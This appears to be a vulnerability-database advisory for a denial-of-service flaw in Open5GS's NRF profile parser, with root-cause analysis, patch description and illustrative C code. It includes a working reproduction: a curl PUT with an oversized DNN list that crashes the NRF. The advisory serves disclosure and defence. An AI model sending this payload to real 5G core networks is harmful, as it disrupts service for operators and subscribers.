VYPR
Medium severity (4.3) · NVD Advisory · Published May 30, 2026

CVE-2026-10115

Description

A vulnerability was identified in Open5GS up to 2.7.7. This affects an unknown part in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. Such manipulation leads to denial of service. The attack can be launched remotely. The exploit is publicly available and might be used. It is advisable to implement a patch to correct this issue.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Open5GS up to v2.7.7 has a DoS vulnerability in the SBI NF-profile parser allowing remote crash via oversized DNN/TAC lists.

Vulnerability

In Open5GS versions up to and including v2.7.7, the shared NF-profile parser in lib/sbi/nnrf-handler.c contains two unbounded inner loops that handle smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList and amfInfo.taiRangeList[*].tacRangeList. When these lists exceed the internal fixed-size budgets (OGS_MAX_NUM_OF_DNN = 16 and OGS_MAX_NUM_OF_TAI = 16), the parser triggers an ogs_assert failure, crashing the process. The bug is reachable from multiple Open5GS network functions (NRF, AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR) through NF profile registration, NF status notifications, or discovery responses [1][2][3].

Exploitation

An attacker can remotely trigger the vulnerability by sending an HTTP/2 PUT request to the NRF's NF registration endpoint (/nnrf-nfm/v1/nf-instances/{nfInstanceId}) with a crafted JSON payload containing more than 16 DNN entries in a DNN list or more than 16 TAC ranges in a TaiRange list. No authentication is required for this path. The exploit is publicly available [2][3].

Impact

Successful exploitation causes the targeted Open5GS network function (e.g., NRF) to crash with a SIGABRT, leading to a denial of service (DoS). The attack can disrupt 5G core network operations, affecting all dependent services.

Mitigation

The fix is implemented in pull request #4527, which introduces a two-tier defense: pre-validation in the NRF register path (rejecting oversized lists with HTTP 400) and a graceful cap-and-break in the shared parser for all other callers. Users should update to a patched version beyond v2.7.7 [1]. The references do not name a patched release; the PR is merged into the main branch, so deployments pinned to v2.7.7 or earlier need the fix backported or a build from main until a release ships.

AI Insight generated on May 30, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products (2)

  • Open5gs/Open5gs (2 versions, no CPE): range <= 2.7.7

Patches (0)

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing bounds check on attacker-controlled inner-list lengths in the shared NF-profile parser causes an assertion failure and process abort."

Attack vector

An attacker with network access to the NRF can send a crafted HTTP/2 PUT request to the `/nnrf-nfm/v1/nf-instances/{nfInstanceId}` endpoint with an `smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList` containing more than 16 DNN entries [ref_id=2]. The shared parser hits `ogs_assert(dnn_index < OGS_MAX_NUM_OF_DNN)` at `lib/sbi/nnrf-handler.c:434`, which aborts the NRF process (exit code 139) and terminates the HTTP/2 stream, causing a denial of service [ref_id=2][ref_id=3]. The same handler is also reachable from other NF-profile parsing paths such as nf-status-notify and discovery responses consumed by other Open5GS network functions [ref_id=2].

Affected code

The bug resides in the shared NF-profile parser at `lib/sbi/nnrf-handler.c`. Two unbounded inner loops in `handle_smf_info()` (line 434) and `handle_amf_info()` (line 796) crash the NRF with SIGABRT when a peer-supplied NF registration carries more than `OGS_MAX_NUM_OF_DNN` (16) DNN entries per S-NSSAI slice or more than `OGS_MAX_NUM_OF_TAI` (16) TAC ranges per `amfInfo TaiRange` [ref_id=1][ref_id=2].

What the fix does

The patch introduces a two-tier defence [ref_id=1]. Tier 1 adds a pre-validation helper `nfprofile_inner_lists_overflow()` in the NRF register path (`src/nrf/nnrf-handler.c`) that rejects oversized `dnnSmfInfoList` or `tacRangeList` with HTTP 400 Bad Request before the shared parser is reached. Tier 2 converts the assertions in `lib/sbi/nnrf-handler.c` into a graceful cap-and-break so that other callers (NF-Set discovery responses, notification consumers) do not crash on oversized data. This ensures the process never aborts on peer-controlled NF-profile data.
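To make the assertion-versus-cap distinction concrete, here is a small C model of the vulnerable inner loop and the two-tier fix described above. This is an added illustration, not Open5GS code: the struct names, the `MAX_PEER_ENTRIES` bound, the helper name `nfprofile_inner_lists_overflow_example` and its signature are assumptions made for the example, and the real parser walks OpenAPI list nodes rather than a fixed array. Only the two budgets quoted on this page (`OGS_MAX_NUM_OF_DNN`, `OGS_MAX_NUM_OF_TAI` = 16) are taken from the description.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Budgets as quoted on this page for Open5GS's fixed-size NF-profile storage. */
#define OGS_MAX_NUM_OF_DNN 16
#define OGS_MAX_NUM_OF_TAI 16

/* Bound for the constructed inputs only; the real parser walks an unbounded OpenAPI list. */
#define MAX_PEER_ENTRIES 64

/* Stand-in for one smfInfo.sNssaiSmfInfoList[*] element: a peer-controlled dnnSmfInfoList. */
typedef struct {
    const char *dnn[MAX_PEER_ENTRIES];
    int num_dnn;
} snssai_smf_info_t;

/* Stand-in for amfInfo.taiRangeList[*]: only the tacRangeList length matters here. */
typedef struct {
    int num_tac_range;
} tai_range_t;

/* Minimal NFProfile view holding just the two inner lists this CVE concerns (assumed shape). */
typedef struct {
    snssai_smf_info_t slice[4];
    int num_slice;
    tai_range_t tai_range[4];
    int num_tai_range;
} nf_profile_t;

/* Fixed-size destination, like the slice[].dnn[] array the shared parser fills. */
typedef struct {
    char dnn[OGS_MAX_NUM_OF_DNN][64];
    int num_of_dnn;
} parsed_slice_t;

/* Pre-fix shape of the loop: the only guard is an assertion. With a 17th DNN the assert
 * fires; in Open5GS ogs_assert() logs FATAL and calls abort(), so the whole NF dies. */
int handle_smf_info_vulnerable(const snssai_smf_info_t *in, parsed_slice_t *out)
{
    int dnn_index = 0;
    for (int i = 0; i < in->num_dnn; i++) {
        assert(dnn_index < OGS_MAX_NUM_OF_DNN);   /* models ogs_assert(); aborts on overflow */
        snprintf(out->dnn[dnn_index], sizeof out->dnn[dnn_index], "%s", in->dnn[i]);
        dnn_index++;
    }
    out->num_of_dnn = dnn_index;
    return dnn_index;
}

/* Tier 1 (NRF register path): returns nonzero when any inner list exceeds its budget so the
 * caller can answer 400 Bad Request before the shared parser runs. Illustrative helper. */
int nfprofile_inner_lists_overflow_example(const nf_profile_t *p)
{
    for (int s = 0; s < p->num_slice; s++)
        if (p->slice[s].num_dnn > OGS_MAX_NUM_OF_DNN)
            return 1;
    for (int t = 0; t < p->num_tai_range; t++)
        if (p->tai_range[t].num_tac_range > OGS_MAX_NUM_OF_TAI)
            return 1;
    return 0;
}

/* Tier 2 (shared parser): cap-and-break. Keeps the first 16 entries, logs, and returns the
 * number of dropped entries instead of aborting, so non-NRF callers survive oversized data. */
int handle_smf_info_capped(const snssai_smf_info_t *in, parsed_slice_t *out)
{
    int dnn_index = 0;
    for (int i = 0; i < in->num_dnn; i++) {
        if (dnn_index >= OGS_MAX_NUM_OF_DNN) {
            fprintf(stderr, "WARN: dnnSmfInfoList has %d entries, capping at %d\n",
                    in->num_dnn, OGS_MAX_NUM_OF_DNN);
            break;
        }
        snprintf(out->dnn[dnn_index], sizeof out->dnn[dnn_index], "%s", in->dnn[i]);
        dnn_index++;
    }
    out->num_of_dnn = dnn_index;
    return in->num_dnn - dnn_index;
}

/* Constructed input: n DNNs named d0..d(n-1), the same shape as the reproduction payload.
 * Uses one static name pool, so call it for one slice at a time. */
void make_slice(snssai_smf_info_t *s, int n)
{
    static char names[MAX_PEER_ENTRIES][8];
    if (n > MAX_PEER_ENTRIES) n = MAX_PEER_ENTRIES;
    for (int i = 0; i < n; i++) {
        snprintf(names[i], sizeof names[i], "d%d", i);
        s->dnn[i] = names[i];
    }
    s->num_dnn = n;
}

int main(void)
{
    nf_profile_t p;
    parsed_slice_t out;
    memset(&p, 0, sizeof p);
    p.num_slice = 1;

    make_slice(&p.slice[0], 17);            /* one past the budget, as in the exploit */
    printf("tier 1 rejects profile: %d\n", nfprofile_inner_lists_overflow_example(&p));
    int dropped = handle_smf_info_capped(&p.slice[0], &out);
    printf("tier 2 dropped %d entries, kept %d\n", dropped, out.num_of_dnn);

    make_slice(&p.slice[0], 16);            /* at the budget: every path accepts it */
    printf("pre-fix parser stored: %d\n", handle_smf_info_vulnerable(&p.slice[0], &out));
    return 0;
}
```

The pre-fix function is deliberately only exercised at the budget in `main`; feeding it the 17-entry slice aborts the process, which is exactly the behaviour the CVE describes. Note why both tiers matter: Tier 1 alone protects only the NRF's registration endpoint, while the same shared parser is reached by AMF, SMF, PCF and the other NFs when they consume discovery responses and status notifications, so Tier 2 is what keeps those processes alive.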

Preconditions

  • Network: the attacker must be able to send HTTP/2 requests to the NRF's NF-instance registration endpoint.
  • Input: the attacker must supply an NFProfile with more than 16 DNN entries in `smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList` (or more than 16 TAC ranges in `amfInfo.taiRangeList[*].tacRangeList`).

Reproduction

```bash
# Locate the NRF container's IP (assumes a container named "nrf" on a Docker network).
NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf)

# NFProfile with 17 DNN entries (d0..d16) in a single dnnSmfInfoList: one past OGS_MAX_NUM_OF_DNN.
payload=$(cat <<'EOF'
{"nfInstanceId":"fake-smf-nrf","nfType":"SMF","nfStatus":"REGISTERED","smfInfo":{"sNssaiSmfInfoList":[{"sNssai":{"sst":1,"sd":"000001"},"dnnSmfInfoList":[{"dnn":"d0"},{"dnn":"d1"},{"dnn":"d2"},{"dnn":"d3"},{"dnn":"d4"},{"dnn":"d5"},{"dnn":"d6"},{"dnn":"d7"},{"dnn":"d8"},{"dnn":"d9"},{"dnn":"d10"},{"dnn":"d11"},{"dnn":"d12"},{"dnn":"d13"},{"dnn":"d14"},{"dnn":"d15"},{"dnn":"d16"}]}]}}
EOF
)

# Register the fake SMF over cleartext HTTP/2 (h2c), as the references do. The URL is given
# without a port; Open5GS's default NRF SBI port is 7777, so append ":7777" if your deployment
# does not remap it.
curl --http2-prior-knowledge -m 5 -sS -i \
  -X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-smf-nrf" \
  -H 'content-type: application/json' \
  --data "$payload"
```

The NRF process dies and logs: `FATAL: handle_smf_info: Assertion 'dnn_index < OGS_MAX_NUM_OF_DNN' failed. (../lib/sbi/nnrf-handler.c:434)` [ref_id=2][ref_id=3]. The references report exit code 139. Since a shell reports 128 + signal number, 139 corresponds to SIGSEGV (11), whereas the abort() raised by ogs_assert() yields 134 (SIGABRT, 6); the status you observe may therefore depend on how the process is supervised, but the FATAL assertion line in the NRF log is the reliable indicator.

Generated on May 30, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (6)

News mentions (0)

No linked articles in our index yet.